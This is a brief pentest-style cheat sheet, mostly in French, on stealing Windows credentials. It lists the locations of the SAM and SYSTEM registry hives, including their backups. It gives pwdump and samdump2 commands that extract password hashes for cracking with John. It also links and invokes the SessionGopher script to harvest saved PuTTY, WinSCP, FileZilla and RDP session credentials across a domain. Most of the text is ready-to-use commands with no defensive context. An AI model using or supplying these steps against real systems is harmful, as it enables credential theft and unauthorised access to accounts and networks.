1. Windows Passwords SAM and SYSTEM files
Le Security Account Manager (SAM), souvent appelé Security Accounts Manager, est un fichier de base de données. Les mots de passe des utilisateurs sont stockés dans un format haché dans une ruche de registre, soit sous la forme d’un hachage LM, soit sous la forme d’un hachage NTLM. Ce fichier peut être trouvé dans %SystemRoot%/system32/config/SAM et est monté sur HKLM/SAM.
# De base : %SYSTEMROOT% = C:\Windows %SYSTEMROOT%\repair\SAM %SYSTEMROOT%\System32\config\RegBack\SAM %SYSTEMROOT%\System32\config\SAM %SYSTEMROOT%\repair\system %SYSTEMROOT%\System32\config\SYSTEM %SYSTEMROOT%\System32\config\RegBack\system
2. Generate a hash file for John using pwdump or samdump2.
pwdump SYSTEM SAM > /root/sam.txt samdump2 SYSTEM SAM -o sam.txt
3. Passwords stored in services
Sauvegarde des informations de session pour PuTTY, WinSCP, FileZilla, SuperPuTTY, et RDP en utilisant SessionGopher
https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1 Import-Module path\to\SessionGopher.ps1; Invoke-SessionGopher -AllDomain -o Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss